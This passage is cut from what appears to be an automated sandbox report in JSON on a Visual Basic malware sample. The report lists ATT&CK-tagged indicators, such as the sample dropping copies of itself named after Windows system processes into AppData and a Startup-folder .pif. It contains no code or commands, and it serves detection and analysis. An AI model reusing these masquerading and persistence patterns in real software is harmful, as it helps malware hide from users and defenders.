\"%APPDATA%\\WINDOWS\\SERVICES.EXE\" - (UID: 00000000-00005992)\n \"D3_08.exe\" called \"CreateProcessW\" with parameter \"%APPDATA%\\WINDOWS\\LSASS.EXE\" - (UID: 00000000-00005992)\n \"D3_08.exe\" called \"CreateProcessW\" with parameter \"%APPDATA%\\WINDOWS\\SMSS.EXE\" - (UID: 00000000-00005992)\n \"IExplorer.exe\" called \"CreateProcessW\" with parameter \"%WINDIR%\\D3_08.exe\" - (UID: 00000000-00001712)\n \"IExplorer.exe\" called \"CreateProcessW\" with parameter \"%WINDIR%\\system32\\IExplorer.exe\" - (UID: 00000000-00001712)\n \"IExplorer.exe\" called \"CreateProcessW\" with parameter \"%APPDATA%\\WINDOWS\\WINLOGON.EXE\" - (UID: 00000000-00001712)\n \"IExplorer.exe\" called \"CreateProcessW\" with parameter \"%APPDATA%\\WINDOWS\\CSRSS.EXE\" - (UID: 00000000-00001712)\n \"IExplorer.exe\" called \"CreateProcessW\" with parameter \"%APPDATA%\\WINDOWS\\SERVICES.EXE\" - (UID: 00000000-00001712)\n \"IExplorer.exe\" called \"CreateProcessW\" with parameter \"%APPDATA%\\WINDOWS\\LSASS.EXE\" - (UID: 00000000-00001712)\n \"IExplorer.exe\" called \"CreateProcessW\" with parameter \"%APPDATA%\\WINDOWS\\SMSS.EXE\" - (UID: 00000000-00001712)\n \"WINLOGON.EXE\" called \"CreateProcessW\" with parameter \"%WINDIR%\\D3_08.exe\" - (UID: 00000000-00005792)", "origin": "API Call", "attck_id": "T1106", "attck_id_wiki": "https://attack.mitre.org/techniques/T1106"}, {"threat_level_human": "informative", "category": "General", "identifier": "api-22", "type": 6, "relevance": 1, "name": "Fails to load modules at runtime", "description": "\"019179afe76c122e3fa55ec27b73f6c56d923557814f2af0cb0e1c3db41f74f6.exe\" failed to load missing module \"api-ms-win-core-fibers-l1-1-1\" - [base:0; Status:c0000135]\n \"019179afe76c122e3fa55ec27b73f6c56d923557814f2af0cb0e1c3db41f74f6.exe\" failed to load missing module \"api-ms-win-core-localization-l1-2-1\" - [base:0; Status:c0000135]\n \"D3_08.exe\" failed to load missing module \"api-ms-win-core-fibers-l1-1-1\" - [base:0; Status:c0000135]\n \"D3_08.exe\" failed to load missing module \"api-ms-win-core-localization-l1-2-1\" - [base:0; Status:c0000135]\n \"WINLOGON.EXE\" failed to load missing module \"api-ms-win-core-fibers-l1-1-1\" - [base:0; Status:c0000135]\n \"WINLOGON.EXE\" failed to load missing module \"api-ms-win-core-localization-l1-2-1\" - [base:0; Status:c0000135]\n \"IExplorer.exe\" failed to load missing module \"api-ms-win-core-fibers-l1-1-1\" - [base:0; Status:c0000135]\n \"IExplorer.exe\" failed to load missing module \"api-ms-win-core-localization-l1-2-1\" - [base:0; Status:c0000135]\n \"SERVICES.EXE\" failed to load missing module \"api-ms-win-core-fibers-l1-1-1\" - [base:0; Status:c0000135]\n \"SERVICES.EXE\" failed to load missing module \"api-ms-win-core-localization-l1-2-1\" - [base:0; Status:c0000135]\n \"SMSS.EXE\" failed to load missing module \"api-ms-win-core-fibers-l1-1-1\" - [base:0; Status:c0000135]\n \"SMSS.EXE\" failed to load missing module \"api-ms-win-core-localization-l1-2-1\" - [base:0; Status:c0000135]\n \"CSRSS.EXE\" failed to load missing module \"api-ms-win-core-fibers-l1-1-1\" - [base:0; Status:c0000135]\n \"CSRSS.EXE\" failed to load missing module \"api-ms-win-core-localization-l1-2-1\" - [base:0; Status:c0000135]\n \"LSASS.EXE\" failed to load missing module \"api-ms-win-core-fibers-l1-1-1\" - [base:0; Status:c0000135]\n \"LSASS.EXE\" failed to load missing module \"api-ms-win-core-localization-l1-2-1\" - [base:0; Status:c0000135]", "origin": "API Call", "attck_id": "T1574.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1574/002"}, {"threat_level_human": "informative", "category": "General", "identifier": "module-10", "type": 10, "name": "Loads the RPC (Remote Procedure Call) module DLL", "description": "\"019179afe76c122e3fa55ec27b73f6c56d923557814f2af0cb0e1c3db41f74f6.exe\" loaded module \"%WINDIR%\\System32\\rpcrt4.dll\" at 76C10000\n \"D3_08.exe\" loaded module \"%WINDIR%\\System32\\rpcrt4.dll\" at 76C10000\n \"IExplorer.exe\" loaded module \"%WINDIR%\\System32\\rpcrt4.dll\" at 76C10000\n \"WINLOGON.EXE\" loaded module \"%WINDIR%\\System32\\rpcrt4.dll\" at 76C10000\n \"CSRSS.EXE\" loaded module \"%WINDIR%\\System32\\rpcrt4.dll\" at 76C10000\n \"SERVICES.EXE\" loaded module \"%WINDIR%\\System32\\rpcrt4.dll\" at 76C10000\n \"LSASS.EXE\" loaded module \"%WINDIR%\\System32\\rpcrt4.dll\" at 76C10000\n \"SMSS.EXE\" loaded module \"%WINDIR%\\System32\\rpcrt4.dll\" at 76C10000", "origin": "Loaded Module", "attck_id": "T1129", "attck_id_wiki": "https://attack.mitre.org/techniques/T1129"}, {"threat_level_human": "informative", "category": "General", "identifier": "target-67", "type": 9, "relevance": 10, "name": "Process launched with changed environment", "description": "Process \"D3_08.exe\" (UID: 00000000-00005992) was launched with new environment variables: \"USERDNSDOMAIN=\"%OSUSER%-PC\"\"\n Process \"D3_08.exe\" (UID: 00000000-00005992) was launched with modified environment variables: \"NUMBER_OF_PROCESSORS\"", "origin": "Monitored Target", "attck_id": "T1057", "attck_id_wiki": "https://attack.mitre.org/techniques/T1057"}, {"threat_level_human": "informative", "category": "General", "identifier": "static-80", "relevance": 1, "name": "PE file contains executable sections", "description": "\"019179afe76c122e3fa55ec27b73f6c56d923557814f2af0cb0e1c3db41f74f6\" has an executable section named \".text\"\n \"services.exe\" has an executable section named \".text\"\n \"D3_08.exe\" has an executable section named \".text\"\n \"shell.exe\" has an executable section named \".text\"\n \"Data HAPUBWS.exe\" has an executable section named \".text\"\n \"Empty.pif\" has an executable section named \".text\"\n \"New Folder.exe\" has an executable section named \".text\"\n \"WINLOGON.EXE.bin\" has an executable section named \".text\"\n \"IEXPLORER.EXE.67EE4B9B.bin\" has an executable section named \".text\"\n \"CSRSS.EXE.bin\" has an executable section named \".text\"\n \"SERVICES.EXE\" has an executable section named \".text\"\n \"IEXPLORER.EXE.67EE4669.bin\" has an executable section named \".text\"\n \"SMSS.EXE\" has an executable section named \".text\"\n \"LSASS.EXE\" has an executable section named \".text\"\n \"MrD3_08.scr\" has an executable section named \".text\"\n \"D3_08.EXE.67EE4A8B.bin\" has an executable section named \".text\"\n \"D3_08.EXE.67EE4667.bin\" has an executable section named \".text\"\n \"IEXPLORER.EXE.67EE4A8E.bin\" has an executable section named \".text\"", "origin": "Static Parser"}, {"threat_level_human": "informative", "category": "General", "identifier": "static-95", "name": "PE file contains writable sections", "description": "\"019179afe76c122e3fa55ec27b73f6c56d923557814f2af0cb0e1c3db41f74f6\" has an writable section named \".data\"\n \"services.exe\" has an writable section named \".data\"\n \"D3_08.exe\" has an writable section named \".data\"\n \"shell.exe\" has an writable section named \".data\"\n \"Data HAPUBWS.exe\" has an writable section named \".data\"\n \"Empty.pif\" has an writable section named \".data\"\n \"New Folder.exe\" has an writable section named \".data\"\n \"WINLOGON.EXE.bin\" has an writable section named \".data\"\n \"IEXPLORER.EXE.67EE4B9B.bin\" has an writable section named \".data\"\n \"CSRSS.EXE.bin\" has an writable section named \".data\"\n \"SERVICES.EXE\" has an writable section named \".data\"\n \"IEXPLORER.EXE.67EE4669.bin\" has an writable section named \".data\"\n \"SMSS.EXE\" has an writable section named \".data\"\n \"LSASS.EXE\" has an writable section named \".data\"\n \"MrD3_08.scr\" has an writable section named \".data\"\n \"D3_08.EXE.67EE4A8B.bin\" has an writable section named \".data\"\n \"D3_08.EXE.67EE4667.bin\" has an writable section named \".data\"\n \"IEXPLORER.EXE.67EE4A8E.bin\" has an writable section named \".data\"", "origin": "Static Parser"}, {"threat_level_human": "informative", "category": "General", "identifier": "target-103", "type": 9, "relevance": 3, "name": "Spawns new processes that are not known child processes", "description": "Spawned process \"D3_08.exe\" (UID: 00000000-00005992)\n Spawned process \"IExplorer.exe\" (UID: 00000000-00001712)\n Spawned process \"D3_08.exe\" (UID: 00000000-00005496)\n Spawned process \"IExplorer.exe\" (UID: 00000000-00005836)\n Spawned process \"WINLOGON.EXE\" (UID: 00000000-00005792)\n Spawned process \"WINLOGON.EXE\" (UID: 00000000-00005588)\n Spawned process \"D3_08.exe\" (UID: 00000000-00005808)\n Spawned process \"CSRSS.EXE\" (UID: 00000000-00001440)\n Spawned process \"CSRSS.EXE\" (UID: 00000000-00005760)\n Spawned process \"IExplorer.exe\" (UID: 00000000-00004400)\n Spawned process \"D3_08.exe\" (UID: 00000000-00000756)\n Spawned process \"SERVICES.EXE\" (UID: 00000000-00003332)\n Spawned process \"WINLOGON.EXE\" (UID: 00000000-00000964)\n Spawned process \"SERVICES.EXE\" (UID: 00000000-00005724)\n Spawned process \"IExplorer.exe\" (UID: 00000000-00004188)\n Spawned process \"LSASS.EXE\" (UID: 00000000-00004392)\n Spawned process \"LSASS.EXE\" (UID: 00000000-00004248)\n Spawned process \"CSRSS.EXE\" (UID: 00000000-00006052)\n Spawned process \"WINLOGON.EXE\" (UID: 00000000-00004308)\n Spawned process \"D3_08.exe\" (UID: 00000000-00006084)\n Spawned process \"SERVICES.EXE\" (UID: 00000000-00003580)\n Spawned process \"SMSS.EXE\" (UID: 00000000-00004268)\n Spawned process \"SMSS.EXE\" (UID: 00000000-00004240)\n Spawned process \"D3_08.exe\" (UID: 00000000-00003616)\n Spawned process \"D3_08.exe\" (UID: 00000000-00003476)", "origin": "Monitored Target", "attck_id": "T1057", "attck_id_wiki": "https://attack.mitre.org/techniques/T1057"}, {"threat_level_human": "informative", "category": "General", "identifier": "target-25", "type": 9, "relevance": 3, "name": "Spawns new processes", "description": "Spawned process \"D3_08.exe\" (UID: 00000000-00005992)\n Spawned process \"IExplorer.exe\" (UID: 00000000-00001712)\n Spawned process \"D3_08.exe\" (UID: 00000000-00005496)\n Spawned process \"IExplorer.exe\" (UID: 00000000-00005836)\n Spawned process \"WINLOGON.EXE\" (UID: 00000000-00005792)\n Spawned process \"WINLOGON.EXE\" (UID: 00000000-00005588)\n Spawned process \"D3_08.exe\" (UID: 00000000-00005808)\n Spawned process \"CSRSS.EXE\" (UID: 00000000-00001440)\n Spawned process \"CSRSS.EXE\" (UID: 00000000-00005760)\n Spawned process \"IExplorer.exe\" (UID: 00000000-00004400)\n Spawned process \"D3_08.exe\" (UID: 00000000-00000756)\n Spawned process \"SERVICES.EXE\" (UID: 00000000-00003332)\n Spawned process \"WINLOGON.EXE\" (UID: 00000000-00000964)\n Spawned process \"SERVICES.EXE\" (UID: 00000000-00005724)\n Spawned process \"IExplorer.exe\" (UID: 00000000-00004188)\n Spawned process \"LSASS.EXE\" (UID: 00000000-00004392)\n Spawned process \"LSASS.EXE\" (UID: 00000000-00004248)\n Spawned process \"CSRSS.EXE\" (UID: 00000000-00006052)\n Spawned process \"WINLOGON.EXE\" (UID: 00000000-00004308)\n Spawned process \"D3_08.exe\" (UID: 00000000-00006084)\n Spawned process \"SERVICES.EXE\" (UID: 00000000-00003580)\n Spawned process \"SMSS.EXE\" (UID: 00000000-00004268)\n Spawned process \"SMSS.EXE\" (UID: 00000000-00004240)\n Spawned process \"D3_08.exe\" (UID: 00000000-00003616)\n Spawned process \"D3_08.exe\" (UID: 00000000-00003476)", "origin": "Monitored Target", "attck_id": "T1057", "attck_id_wiki": "https://attack.mitre.org/techniques/T1057"}, {"threat_level_human": "informative", "category": "General", "identifier": "static-157", "name": "Matched Compiler/Packer signature (DIE)", "description": "\"019179afe76c122e3fa55ec27b73f6c56d923557814f2af0cb0e1c3db41f74f6\" was detected as \"Microsoft Visual Basic\" and name: \"Compiler\"\n \"019179afe76c122e3fa55ec27b73f6c56d923557814f2af0cb0e1c3db41f74f6\" was detected as \"Microsoft Linker\" and name: \"Linker\"\n \"services.exe\" was detected as \"Microsoft Visual Basic\" and name: \"Compiler\"\n \"services.exe\" was detected as \"Microsoft Linker\" and name: \"Linker\"\n \"D3_08.exe\" was detected as \"Microsoft Visual Basic\" and name: \"Compiler\"\n \"D3_08.exe\" was detected as \"Microsoft Linker\" and name: \"Linker\"\n \"shell.exe\" was detected as \"Microsoft Visual Basic\" and name: \"Compiler\"\n \"shell.exe\" was detected as \"Microsoft Linker\" and name: \"Linker\"\n \"Data HAPUBWS.exe\" was detected as \"Microsoft Visual Basic\" and name: \"Compiler\"\n \"Data HAPUBWS.exe\" was detected as \"Microsoft Linker\" and name: \"Linker\"\n \"Empty.pif\" was detected as \"Microsoft Visual Basic\" and name: \"Compiler\"\n \"Empty.pif\" was detected as \"Microsoft Linker\" and name: \"Linker\"\n \"New Folder.exe\" was detected as \"Microsoft Visual Basic\" and name: \"Compiler\"\n \"New Folder.exe\" was detected as \"Microsoft Linker\" and name: \"Linker\"\n \"WINLOGON.EXE.bin\" was detected as \"Microsoft Visual Basic\" and name: \"Compiler\"\n \"WINLOGON.EXE.bin\" was detected as \"Microsoft Linker\" and name: \"Linker\"\n \"IEXPLORER.EXE.67EE4B9B.bin\" was detected as \"Microsoft Visual Basic\" and name: \"Compiler\"\n \"IEXPLORER.EXE.67EE4B9B.bin\" was detected as \"Microsoft Linker\" and name: \"Linker\"\n \"CSRSS.EXE.bin\" was detected as \"Microsoft Visual Basic\" and name: \"Compiler\"\n \"CSRSS.EXE.bin\" was detected as \"Microsoft Linker\" and name: \"Linker\"\n \"SERVICES.EXE\" was detected as \"Microsoft Visual Basic\" and name: \"Compiler\"\n \"SERVICES.EXE\" was detected as \"Microsoft Linker\" and name: \"Linker\"\n \"IEXPLORER.EXE.67EE4669.bin\" was detected as \"Microsoft Visual Basic\" and name: \"Compiler\"\n \"IEXPLORER.EXE.67EE4669.bin\" was detected as \"Microsoft Linker\" and name: \"Linker\"\n \"SMSS.EXE\" was detected as \"Microsoft Visual Basic\" and name: \"Compiler\"\n \"SMSS.EXE\" was detected as \"Microsoft Linker\" and name: \"Linker\"\n \"LSASS.EXE\" was detected as \"Microsoft Visual Basic\" and name: \"Compiler\"\n \"LSASS.EXE\" was detected as \"Microsoft Linker\" and name: \"Linker\"\n \"MrD3_08.scr\" was detected as \"Microsoft Visual Basic\" and name: \"Compiler\"\n \"MrD3_08.scr\" was detected as \"Microsoft Linker\" and name: \"Linker\"\n \"D3_08.EXE.67EE4A8B.bin\" was detected as \"Microsoft Visual Basic\" and name: \"Compiler\"\n \"D3_08.EXE.67EE4A8B.bin\" was detected as \"Microsoft Linker\" and name: \"Linker\"\n \"D3_08.EXE.67EE4667.bin\" was detected as \"Microsoft Visual Basic\" and name: \"Compiler\"\n \"D3_08.EXE.67EE4667.bin\" was detected as \"Microsoft Linker\" and name: \"Linker\"\n \"IEXPLORER.EXE.67EE4A8E.bin\" was detected as \"Microsoft Visual Basic\" and name: \"Compiler\"\n \"IEXPLORER.EXE.67EE4A8E.bin\" was detected as \"Microsoft Linker\" and name: \"Linker\"", "origin": "Static Parser", "attck_id": "T1027", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027"}, {"threat_level_human": "informative", "category": "Unusual Characteristics", "identifier": "binary-37", "type": 8, "relevance": 3, "name": "Drops files inside appdata directory", "description": "Dropped file: \"services.exe\" - Location: [%LOCALAPPDATA%\\services.exe]- [targetUID: 00000000-00000960]\n Dropped file: \"SERVICES.EXE\" - Location: [%LOCALAPPDATA%\\WINDOWS\\SERVICES.EXE]- [targetUID: 00000000-00000960]\n Dropped file: \"SMSS.EXE\" - Location: [%LOCALAPPDATA%\\WINDOWS\\SMSS.EXE]- [targetUID: 00000000-00000960]\n Dropped file: \"LSASS.EXE\" - Location: [%LOCALAPPDATA%\\WINDOWS\\LSASS.EXE]- [targetUID: 00000000-00000960]\n Dropped file: \"lsass.exe\" - Location: [%LOCALAPPDATA%\\lsass.exe]- [targetUID: 00000000-00000960]\n Dropped file: \"IExplorer.exe\" - Location: [%LOCALAPPDATA%\\IExplorer.exe]- [targetUID: 00000000-00000960]\n Dropped file: \"winlogon.exe\" - Location: [%LOCALAPPDATA%\\winlogon.exe]- [targetUID: 00000000-00000960]\n Dropped file: \"smss.exe\" - Location: [%LOCALAPPDATA%\\smss.exe]- [targetUID: 00000000-00000960]\n Dropped file: \"D3_08.exe\" - Location: [%LOCALAPPDATA%\\D3_08.exe]- [targetUID: 00000000-00000960]\n Dropped file: \"csrss.exe\" - Location: [%LOCALAPPDATA%\\csrss.exe]- [targetUID: 00000000-00000960]\n Dropped file: \"LSASS.EXE\" - Location: [%LOCALAPPDATA%\\LSASS.EXE]- [targetUID: 00000000-00000960]\n Dropped file: \"SMSS.EXE\" - Location: [%LOCALAPPDATA%\\SMSS.EXE]- [targetUID: 00000000-00000960]\n Dropped file: \"SERVICES.EXE\" - Location: [%LOCALAPPDATA%\\SERVICES.EXE]- [targetUID: 00000000-00000960]\n Dropped file: \"WINLOGON.EXE\" - Location: [%LOCALAPPDATA%\\WINDOWS\\WINLOGON.EXE]- [targetUID: 00000000-00000960]\n Dropped file: \"WINLOGON.EXE\" - Location: [%LOCALAPPDATA%\\WINLOGON.EXE]- [targetUID: 00000000-00000960]\n Dropped file: \"CSRSS.EXE\" - Location: [%LOCALAPPDATA%\\CSRSS.EXE]- [targetUID: 00000000-00000960]\n Dropped file: \"CSRSS.EXE\" - Location: [%LOCALAPPDATA%\\WINDOWS\\CSRSS.EXE]- [targetUID: 00000000-00000960]", "origin": "Binary File", "attck_id": "T1036", "attck_id_wiki": "https://attack.mitre.org/techniques/T1036"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "api-126", "type": 6, "relevance": 3, "name": "Tries to access non-existent files (executable)", "description": "\"019179afe76c122e3fa55ec27b73f6c56d923557814f2af0cb0e1c3db41f74f6.exe\" trying to access non-existent file \"C:\\MSVBVM60.DLL\"\n \"019179afe76c122e3fa55ec27b73f6c56d923557814f2af0cb0e1c3db41f74f6.exe\" trying to access non-existent file \"C:\\CRYPTBASE.dll\"\n \"019179afe76c122e3fa55ec27b73f6c56d923557814f2af0cb0e1c3db41f74f6.exe\" trying to access non-existent file \"C:\\SXS.DLL\"\n \"019179afe76c122e3fa55ec27b73f6c56d923557814f2af0cb0e1c3db41f74f6.exe\" trying to access non-existent file \"C:\\CRYPTSP.dll\"\n \"019179afe76c122e3fa55ec27b73f6c56d923557814f2af0cb0e1c3db41f74f6.exe\" trying to access non-existent file \"C:\\FLTLIB.DLL\"\n \"019179afe76c122e3fa55ec27b73f6c56d923557814f2af0cb0e1c3db41f74f6.exe\" trying to access non-existent file \"C:\\Windows\\system32\\api-ms-win-core-fibers-l1-1-1.DLL\"\n \"019179afe76c122e3fa55ec27b73f6c56d923557814f2af0cb0e1c3db41f74f6.exe\" trying to access non-existent file \"C:\\Windows\\system32\\api-ms-win-core-localization-l1-2-1.DLL\"\n \"019179afe76c122e3fa55ec27b73f6c56d923557814f2af0cb0e1c3db41f74f6.exe\" trying to access non-existent file \"C:\\dwmapi.dll\"\n \"019179afe76c122e3fa55ec27b73f6c56d923557814f2af0cb0e1c3db41f74f6.exe\" trying to access non-existent file \"C:\\ntmarta.dll\"\n \"019179afe76c122e3fa55ec27b73f6c56d923557814f2af0cb0e1c3db41f74f6.exe\" trying to access non-existent file \"C:\\Users\\%OSUSER%\\Local Settings\\Application Data\\WINDOWS\\WINLOGON.EXE\"\n \"019179afe76c122e3fa55ec27b73f6c56d923557814f2af0cb0e1c3db41f74f6.exe\" trying to access non-existent file \"C:\\Users\\%OSUSER%\\Local Settings\\Application Data\\WINDOWS\\LSASS.exe\"\n \"019179afe76c122e3fa55ec27b73f6c56d923557814f2af0cb0e1c3db41f74f6.exe\" trying to access non-existent file \"C:\\Users\\%OSUSER%\\Local Settings\\Application Data\\WINDOWS\\CSRSS.EXE\"\n \"019179afe76c122e3fa55ec27b73f6c56d923557814f2af0cb0e1c3db41f74f6.exe\" trying to access non-existent file \"C:\\Users\\%OSUSER%\\Local Settings\\Application Data\\WINDOWS\\SERVICES.EXE\"\n \"019179afe76c122e3fa55ec27b73f6c56d923557814f2af0cb0e1c3db41f74f6.exe\" trying to access non-existent file \"C:\\Users\\%OSUSER%\\Local Settings\\Application Data\\WINDOWS\\SMSS.EXE\"\n \"019179afe76c122e3fa55ec27b73f6c56d923557814f2af0cb0e1c3db41f74f6.exe\" trying to access non-existent file \"C:\\Windows\\D3_08.exe\"\n \"019179afe76c122e3fa55ec27b73f6c56d923557814f2af0cb0e1c3db41f74f6.exe\" trying to access non-existent file \"C:\\D3_08.exe\"\n \"019179afe76c122e3fa55ec27b73f6c56d923557814f2af0cb0e1c3db41f74f6.exe\" trying to access non-existent file \"C:\\Windows\\system32\\shell.exe\"\n \"019179afe76c122e3fa55ec27b73f6c56d923557814f2af0cb0e1c3db41f74f6.exe\" trying to access non-existent file \"C:\\Users\\%OSUSER%\\Local.exe\"\n \"019179afe76c122e3fa55ec27b73f6c56d923557814f2af0cb0e1c3db41f74f6.exe\" trying to access non-existent file \"C:\\Users\\%OSUSER%\\Local Settings\\Application.exe\"", "origin": "API Call", "attck_id": "T1083", "attck_id_wiki": "https://attack.mitre.org/techniques/T1083"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "api-263", "type": 6, "relevance": 1, "name": "Touches files", "description": "\"019179afe76c122e3fa55ec27b73f6c56d923557814f2af0cb0e1c3db41f74f6.exe\" trying to touch file \"C:\\MSVBVM60.DLL\"\n \"019179afe76c122e3fa55ec27b73f6c56d923557814f2af0cb0e1c3db41f74f6.exe\" trying to touch file \"C:\\Windows\\system32\\MSVBVM60.DLL\"\n \"019179afe76c122e3fa55ec27b73f6c56d923557814f2af0cb0e1c3db41f74f6.exe\" trying to touch file \"C:\\Windows\\SYSTEM32\\sechost.dll\"\n \"019179afe76c122e3fa55ec27b73f6c56d923557814f2af0cb0e1c3db41f74f6.exe\" trying to touch file \"C:\\Windows\\system32\\IMM32.DLL\"\n \"019179afe76c122e3fa55ec27b73f6c56d923557814f2af0cb0e1c3db41f74f6.exe\" trying to touch file \"C:\\Windows\\system32\\rpcss.dll\"\n \"019179afe76c122e3fa55ec27b73f6c56d923557814f2af0cb0e1c3db41f74f6.exe\" trying to touch file \"C:\\CRYPTBASE.dll\"\n \"019179afe76c122e3fa55ec27b73f6c56d923557814f2af0cb0e1c3db41f74f6.exe\" trying to touch file \"C:\\Windows\\system32\\CRYPTBASE.dll\"\n \"019179afe76c122e3fa55ec27b73f6c56d923557814f2af0cb0e1c3db41f74f6.exe\" trying to touch file \"\\Device\\KsecDD\"\n \"019179afe76c122e3fa55ec27b73f6c56d923557814f2af0cb0e1c3db41f74f6.exe\" trying to touch file \"C:\\Windows\\system32\\uxtheme.dll\"\n \"019179afe76c122e3fa55ec27b73f6c56d923557814f2af0cb0e1c3db41f74f6.exe\" trying to touch file \"C:\\019179afe76c122e3fa55ec27b73f6c56d923557814f2af0cb0e1c3db41f74f6.exe.cfg\"\n \"019179afe76c122e3fa55ec27b73f6c56d923557814f2af0cb0e1c3db41f74f6.exe\" trying to touch file \"C:\\SXS.DLL\"\n \"019179afe76c122e3fa55ec27b73f6c56d923557814f2af0cb0e1c3db41f74f6.exe\" trying to touch file \"C:\\Windows\\system32\\SXS.DLL\"\n \"019179afe76c122e3fa55ec27b73f6c56d923557814f2af0cb0e1c3db41f74f6.exe\" trying to touch file \"C:\\Windows\\system32\\c_932.nls\"\n \"019179afe76c122e3fa55ec27b73f6c56d923557814f2af0cb0e1c3db41f74f6.exe\" trying to touch file \"C:\\Windows\\system32\\c_949.nls\"\n \"019179afe76c122e3fa55ec27b73f6c56d923557814f2af0cb0e1c3db41f74f6.exe\" trying to touch file \"C:\\Windows\\system32\\c_950.nls\"\n \"019179afe76c122e3fa55ec27b73f6c56d923557814f2af0cb0e1c3db41f74f6.exe\" trying to touch file \"C:\\Windows\\system32\\c_936.nls\"\n \"019179afe76c122e3fa55ec27b73f6c56d923557814f2af0cb0e1c3db41f74f6.exe\" trying to touch file \"C:\\CRYPTSP.dll\"\n \"019179afe76c122e3fa55ec27b73f6c56d923557814f2af0cb0e1c3db41f74f6.exe\" trying to touch file \"C:\\Windows\\system32\\CRYPTSP.dll\"\n \"019179afe76c122e3fa55ec27b73f6c56d923557814f2af0cb0e1c3db41f74f6.exe\" trying to touch file \"C:\\Windows\\system32\\rsaenh.dll\"", "origin": "API Call", "attck_id": "T1083", "attck_id_wiki": "https://attack.mitre.org/techniques/T1083"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "api-161", "type": 6, "relevance": 3, "name": "Tries to access non-existent files (non-executable)", "description": "\"019179afe76c122e3fa55ec27b73f6c56d923557814f2af0cb0e1c3db41f74f6.exe\" trying to access non-existent file \"C:\\019179afe76c122e3fa55ec27b73f6c56d923557814f2af0cb0e1c3db41f74f6.exe.cfg\"\n \"019179afe76c122e3fa55ec27b73f6c56d923557814f2af0cb0e1c3db41f74f6.exe\" trying to access non-existent file \"C:\\019179afe76c122e3fa55ec27b73f6c56d923557814f2af0cb0e1c3db41f74f6.exe.Local\\\"\n \"019179afe76c122e3fa55ec27b73f6c56d923557814f2af0cb0e1c3db41f74f6.exe\" trying to access non-existent file \"C:\\019179afe76c122e3fa55ec27b73f6c56d923557814f2af0cb0e1c3db41f74f6.pif\"", "origin": "API Call", "attck_id": "T1083", "attck_id_wiki": "https://attack.mitre.org/techniques/T1083"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "api-243", "type": 6, "relevance": 1, "name": "Reads files", "description": "\"019179afe76c122e3fa55ec27b73f6c56d923557814f2af0cb0e1c3db41f74f6.exe\" reads file \"c:\\users\\desktop.ini\"\n \"019179afe76c122e3fa55ec27b73f6c56d923557814f2af0cb0e1c3db41f74f6.exe\" reads file \"c:\\users\\%osuser%\\documents\\desktop.ini\"\n \"019179afe76c122e3fa55ec27b73f6c56d923557814f2af0cb0e1c3db41f74f6.exe\" reads file \"c:\\019179afe76c122e3fa55ec27b73f6c56d923557814f2af0cb0e1c3db41f74f6.exe\"", "origin": "API Call", "attck_id": "T1083", "attck_id_wiki": "https://attack.mitre.org/techniques/T1083"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "api-242", "type": 6, "relevance": 1, "name": "Writes files", "description": "\"019179afe76c122e3fa55ec27b73f6c56d923557814f2af0cb0e1c3db41f74f6.exe\" writes file \"c:\\users\\hapubws\\appdata\\local\\lsass.exe\"\n \"019179afe76c122e3fa55ec27b73f6c56d923557814f2af0cb0e1c3db41f74f6.exe\" writes file \"c:\\users\\hapubws\\appdata\\local\\services.exe\"\n \"019179afe76c122e3fa55ec27b73f6c56d923557814f2af0cb0e1c3db41f74f6.exe\" writes file \"c:\\windows\\d3_08.exe\"\n \"019179afe76c122e3fa55ec27b73f6c56d923557814f2af0cb0e1c3db41f74f6.exe\" writes file \"c:\\d3_08.exe\"\n \"019179afe76c122e3fa55ec27b73f6c56d923557814f2af0cb0e1c3db41f74f6.exe\" writes file \"c:\\windows\\system32\\shell.exe\"\n \"019179afe76c122e3fa55ec27b73f6c56d923557814f2af0cb0e1c3db41f74f6.exe\" writes file \"c:\\windows\\system32\\mrd3_08.scr\"\n \"019179afe76c122e3fa55ec27b73f6c56d923557814f2af0cb0e1c3db41f74f6.exe\" writes file \"c:\\windows\\system32\\iexplorer.exe\"\n \"019179afe76c122e3fa55ec27b73f6c56d923557814f2af0cb0e1c3db41f74f6.exe\" writes file \"c:\\programdata\\microsoft\\windows\\start menu\\programs\\startup\\empty.pif\"\n \"019179afe76c122e3fa55ec27b73f6c56d923557814f2af0cb0e1c3db41f74f6.exe\" writes file \"c:\\users\\%osuser%\\appdata\\local\\windows\\winlogon.exe\"", "origin": "API Call"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "api-16", "type": 6, "relevance": 1, "name": "Connects to LPC ports", "description": "\"019179afe76c122e3fa55ec27b73f6c56d923557814f2af0cb0e1c3db41f74f6.exe\" connecting to \"\\ThemeApiPort\"\n \"D3_08.exe\" connecting to \"\\ThemeApiPort\"\n \"IExplorer.exe\" connecting to \"\\ThemeApiPort\"\n \"CSRSS.EXE\" connecting to \"\\ThemeApiPort\"\n \"SMSS.EXE\" connecting to \"\\ThemeApiPort\"\n \"SERVICES.EXE\" connecting to \"\\ThemeApiPort\"", "origin": "API Call", "attck_id": "T1559", "attck_id_wiki": "https://attack.mitre.org/techniques/T1559"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "api-55", "type": 6, "relevance": 7, "name": "Touches files in the Windows directory", "description": "\"019179afe76c122e3fa55ec27b73f6c56d923557814f2af0cb0e1c3db41f74f6.exe\" touched file \"C:\\Windows\\AppPatch\\sysmain.sdb\"\n \"019179afe76c122e3fa55ec27b73f6c56d923557814f2af0cb0e1c3db41f74f6.exe\" touched file \"C:\\Users\\%OSUSER%\\AppData\\Local\\Microsoft\\Windows\\Caches\"\n \"019179afe76c122e3fa55ec27b73f6c56d923557814f2af0cb0e1c3db41f74f6.exe\" touched file \"C:\\Windows\\D3_08.exe\"\n \"019179afe76c122e3fa55ec27b73f6c56d923557814f2af0cb0e1c3db41f74f6.exe\" touched file \"C:\\Windows\\System32\\shell.exe\"\n \"019179afe76c122e3fa55ec27b73f6c56d923557814f2af0cb0e1c3db41f74f6.exe\" touched file \"C:\\Windows\\System32\\MrD3_08.scr\"\n \"019179afe76c122e3fa55ec27b73f6c56d923557814f2af0cb0e1c3db41f74f6.exe\" touched file \"C:\\Windows\\System32\\IExplorer.exe\"\n \"019179afe76c122e3fa55ec27b73f6c56d923557814f2af0cb0e1c3db41f74f6.exe\" touched file \"C:\\ProgramData\\Microsoft\\Windows\\Start 